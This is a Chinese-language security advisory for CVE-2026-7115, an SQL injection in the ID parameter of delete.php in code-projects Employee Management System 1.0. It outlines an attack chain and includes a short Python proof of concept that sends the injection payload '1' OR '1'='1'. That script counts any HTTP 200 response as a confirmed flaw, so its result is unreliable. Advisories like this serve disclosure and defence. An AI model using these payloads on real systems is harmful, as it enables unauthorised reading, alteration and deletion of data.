CVE-2026-7115 CVSS 6.3 中危

CVE-2026-7115: 员工管理系统SQL注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7115

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Employee Management System

漏洞概述

该漏洞存在于 code-projects Employee Management System 1.0 版本中。由于 `370project/delete.php` 文件在处理删除操作时，未对用户提交的 `ID` 参数进行充分的过滤与验证，直接将其拼接到 SQL 查询语句中，导致攻击者可以通过构造恶意 SQL 语句实施注入攻击。攻击者可利用此漏洞远程获取数据库敏感信息、篡改或删除数据。目前该漏洞的利用代码已公开，风险处于中危水平。

技术细节

漏洞技术细节指向 code-projects Employee Management System 1.0 中的 `370project/delete.php` 文件。该文件在接收 HTTP 请求参数 `ID` 时，缺乏有效的输入清理机制，导致参数值被直接嵌入到动态 SQL 查询中。根据 CVSS 3.1 向量 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)，攻击者只需具备低权限账户（PR:L）即可通过网络（AV:N）发起攻击，且无需用户交互（UI:N）。攻击者可以通过发送包含 SQL 元字符（如单引号、注释符）的 payload，绕过原有的查询逻辑，执行联合查询（UNION SELECT）或布尔盲注。这不仅会导致机密性泄露（C:L），如读取用户密码哈希，还可能导致数据完整性破坏（I:L）和服务可用性下降（A:L）。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标运行的是 code-projects Employee Management System 1.0，并定位到 `370project/delete.php` 接口。

STEP 2

2. 获取访问权限

由于漏洞需要低权限（PR:L），攻击者通过注册或使用默认凭证登录系统获取合法会话。

STEP 3

3. 漏洞利用

攻击者向 `delete.php` 发送特制的 HTTP GET/POST 请求，在 `ID` 参数中注入恶意 SQL 载荷（如 `1' UNION SELECT...`）。

STEP 4

4. 数据窃取与破坏

后端数据库执行恶意 SQL 语句，返回敏感数据（如管理员密码）或执行删除/修改操作，导致系统完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-ip/370project/delete.php"

# Payload to test for SQL Injection (e.g., Boolean-based)
# This payload attempts to make the SQL statement always true or cause an error
payload = "1' OR '1'='1" 

params = {
    "ID": payload
}

try:
    response = requests.get(target_url, params=params, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response Length: {len(response.text)}")
    # Analyze response to confirm vulnerability based on content or errors
    if "error" in response.text.lower() or response.status_code == 200:
        print("Potential SQL Injection vulnerability confirmed.")
except requests.RequestException as e:
    print(f"Error connecting to target: {e}")

影响范围

code-projects Employee Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议在 Web 应用防火墙（WAF）上部署规则，拦截针对 `delete.php` 的异常 SQL 请求特征。同时，严格限制对系统后台的访问权限，仅允许受信任的 IP 地址访问，并加强对数据库操作的日志审计，以便及时发现异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7115
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7115
3 Details https://www.cvedetails.com/cve/CVE-2026-7115/
4 VulDB https://vuldb.com/cve/CVE-2026-7115
5 Link https://code-projects.org/
6 Link https://github.com/zzzxc643/CVE1/blob/main/EMPLOYEE_MANAGEMENT_SYSTEM/vul5.md
7 Link https://vuldb.com/submit/800835
8 Link https://vuldb.com/vuln/359715
9 Link https://vuldb.com/vuln/359715/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表